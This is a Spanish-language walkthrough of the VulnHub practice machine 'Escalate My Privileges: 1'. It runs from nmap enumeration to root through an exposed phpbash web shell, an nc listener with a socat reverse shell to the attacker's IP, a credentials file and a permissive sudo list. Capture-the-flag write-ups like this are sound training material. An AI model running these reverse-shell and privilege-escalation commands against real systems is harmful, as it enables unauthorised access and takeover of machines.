[VLN] Escalate My Privileges

Hoy vamos a hackear la maquina de Vulnhub llamada Escalate My Privileges: 1. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/escalate-my-privileges-1,448/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    sml@Cassandra:~$ nmap -A -p- 192.168.1.29 Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 11:58 CEST Nmap scan report for my_privilege.home (192.168.1.29) Host is up (0.00051s latency). Not shown: 65526 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 61:16:10:91:bd:d7:6c:06:df:a2:b9:b5:b9:3b:dd:b6 (RSA) | 256 0e:a4:c9:fc:de:53:f6:1d:de:a9:de:e4:21:34:7d:1a (ECDSA) |_ 256 ec:27:1e:42:65:1c:4a:3b:93:1c:a1:75:be:00:22:0d (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 |_http-title: 400 Bad Request 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100003 3,4 2049/tcp nfs | 100003 3,4 2049/tcp6 nfs | 100003 3,4 2049/udp nfs | 100003 3,4 2049/udp6 nfs | 100005 1,2,3 20048/tcp mountd | 100005 1,2,3 20048/tcp6 mountd | 100005 1,2,3 20048/udp mountd | 100005 1,2,3 20048/udp6 mountd | 100021 1,3,4 35283/tcp6 nlockmgr | 100021 1,3,4 45561/tcp nlockmgr | 100021 1,3,4 46989/udp6 nlockmgr | 100021 1,3,4 49986/udp nlockmgr | 100024 1 44315/tcp status | 100024 1 49779/udp status | 100024 1 50120/udp6 status | 100024 1 56075/tcp6 status | 100227 3 2049/tcp nfs_acl | 100227 3 2049/tcp6 nfs_acl | 100227 3 2049/udp nfs_acl |_ 100227 3 2049/udp6 nfs_acl 875/tcp closed unknown 2049/tcp open nfs_acl 3 (RPC #100227) 20048/tcp open mountd 1-3 (RPC #100005) 42955/tcp closed unknown 46666/tcp closed unknown 54302/tcp closed unknown Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 149.54 seconds
    Si miramos el codigo fuente de la web inicial vemos: alt="http://ip/phpbash.php"> Tambien en el robots.txt podemos ver que hace mencion a phpbash.php asi que accedemos a : http://192.168.1.29/phpbash.php
  • Exploitation
  • Ya que tenemos acceso a la shell que nos facilita phpbash.php vamos a utilizarla para obtener una reverse shell. En nuestra maquina ejecutamos:
    nc -nlvp 5555
    En phpbash.php ejecutamos:
    socat tcp-connect:192.168.1.148:5555 exec:sh,pty,stderr,setsid,sigint,sane
    Y ya habremos obtenido la reverse shell. Echamos un vistazo al sistema.
    sh-4.2$ cd /home sh-4.2$ ls armour sh-4.2$ cd armour sh-4.2$ ls Credentials.txt backup.sh runme.sh sh-4.2$ cat Credentials.txt my password is md5(rootroot1)
    Vemos que el usuario armour tiene un Credentials.txt indicandonos como obtener su password.
    sml@Cassandra:~$ echo -n rootroot1 | md5sum b7bc8489abe360486b4b19dbc242e885 -
    Probamos a loguearnos como armour con las credenciales obtenidas.
    sh-4.2$ su armour su armour Password: b7bc8489abe360486b4b19dbc242e885 [armour@my_privilege ~]$ id id uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
    Miramos si puede usar sudo.
    [armour@my_privilege ~]$ sudo -l sudo -l Matching Defaults entries for armour on my_privilege: requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", env_keep+=LD_PRELOAD, secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin User armour may run the following commands on my_privilege: (ALL : ALL) NOPASSWD: /bin/sh, /bin/bash, /usr/bin/sh, /usr/bin/bash, /bin/tcsh, /bin/csh, /bin/ksh, /bin/rksh, /bin/zsh, /usr/bin/fish, /bin/dash, /usr/bin/tmux, /usr/bin/rsh, /bin/rc, /usr/bin/rc, /usr/bin/rssh, /usr/bin/scponly, /bin/scponly, /usr/bin/rootsh, /usr/bin/shc, /usr/bin/shtool, /usr/bin/targetcli, /usr/bin/nano, /usr/bin/rnano, /usr/bin/awk, /usr/bin/dgawk, /usr/bin/gawk, /usr/bin/igawk, /usr/bin/pgawk, /usr/bin/curl, /bin/ed, /bin/red, /usr/bin/env, /usr/bin/cat, /usr/bin/chcon, /usr/bin/chgrp, /usr/bin/chmod, /usr/bin/chown, /usr/bin/cp, /usr/bin/cut, /usr/bin/dd, /usr/bin/head, /usr/bin/ln, /usr/bin/mv, /usr/bin/nice, /usr/bin/tail, /usr/bin/uniq, /usr/bin/ftp, /usr/bin/pftp, /usr/bin/zip, /usr/bin/zipcloak, /usr/bin/zipnote, /usr/bin/zipsplit, /usr/bin/funzip, /usr/bin/unzip, /usr/bin/unzipsfx, /usr/bin/zipgrep, /usr/bin/zipinfo, /usr/bin/7za, /usr/bin/socat, /usr/bin/php, /usr/bin/git, /usr/bin/rvim, /usr/bin/rvim, /usr/bin/vim, /usr/bin/vimdiff, /usr/bin/vimtutor, /usr/bin/vi, /bin/sed, /usr/bin/qalc, /usr/bin/e3, /usr/bin/dex, /usr/bin/elinks, /usr/bin/scp, /usr/bin/sftp, /usr/bin/ssh, /usr/bin/gtar, /usr/bin/tar, /usr/bin/rpm, /usr/bin/up2date, /usr/bin/yum, /usr/bin/expect, /usr/bin/find, /usr/bin/less, /usr/bin/more, /usr/bin/perl, /usr/bin/python, /usr/bin/man, /usr/bin/tclsh, /usr/bin/script, /usr/bin/nmap, /usr/bin/nmap, /usr/bin/aria2c, /usr/sbin/arp, /usr/bin/base64, /usr/bin/busybox, /usr/bin/cpan, /usr/bin/cpulimit, /usr/bin/crontab, /usr/bin/date, /usr/bin/diff, /usr/bin/dmesg, /usr/sbin/dmsetup, /usr/bin/dnf, /usr/bin/docker, /usr/bin/easy_install, /usr/bin/emacs, /usr/bin/expand, /usr/bin/facter, /usr/bin/file, /usr/bin/finger, /usr/bin/flock, /usr/bin/fmt, /usr/bin/fold, /usr/bin/gdb, /usr/bin/gimp, /usr/bin/grep, /usr/bin/head, /usr/sbin/iftop, /usr/bin/ionice, /usr/sbin/ip, /usr/bin/irb, /usr/bin/jjs, /usr/bin/journalctl, /usr/bin/jq, /usr/sbin/ldconfig, /usr/sbin/logsave, /usr/bin/ltrace, /usr/bin/lua, /usr/bin/mail, /usr/bin/make, /usr/bin/mawk, /usr/bin/mount, /usr/sbin/mtr, /usr/bin/mysql, /usr/bin/nawk, /usr/bin/ncat, /usr/bin/nl, /usr/bin/node, /usr/bin/od, /usr/bin/openssl, /usr/bin/perl, /usr/bin/pic, /usr/bin/pip, /usr/bin/puppet, /usr/bin/readelf, /usr/bin/red, /usr/bin/rlwrap, /usr/bin/rpmquery, /usr/bin/rsync, /usr/bin/ruby, /usr/bin/run-parts, /usr/bin/screen, /usr/bin/sed, /usr/sbin/service, /usr/bin/setarch, /usr/bin/sftp, /usr/bin/shuf, /usr/bin/smbclient, /usr/bin/socat, /usr/bin/sort, /usr/bin/sqlite3, /usr/bin/stdbuf, /usr/bin/strace, /usr/bin/systemctl, /usr/bin/taskset, /usr/bin/tclsh, /usr/sbin/tcpdump, /usr/bin/tee, /usr/bin/telnet, /usr/bin/tftp, /usr/bin/time, /usr/bin/timeout, /usr/bin/top, /usr/bin/ul, /usr/bin/unexpand, /usr/bin/unshare, /usr/bin/watch, /usr/bin/wget, /usr/bin/xargs, /usr/bin/xxd, /script/test.sh, /script/test.py, /sbin/httpd, /usr/sbin/setcap, /usr/sbin/getcap, /usr/local/bin/ht, /bin/timedatectl, /home/armour/ai, /usr/bin/user_hello
    Como vemos hay muchas (muchisimas) formas de escalar los privilegios y practicar. En este writeup vamos a ir a la sencilla :)
  • Privilege Escalation
  • Tan facil como...
    [armour@my_privilege ~]$ sudo /bin/bash [root@my_privilege armour]# id id uid=0(root) gid=0(root) groups=0(root)
  • End
  • Y con esto ya seriamos root de la maquina :)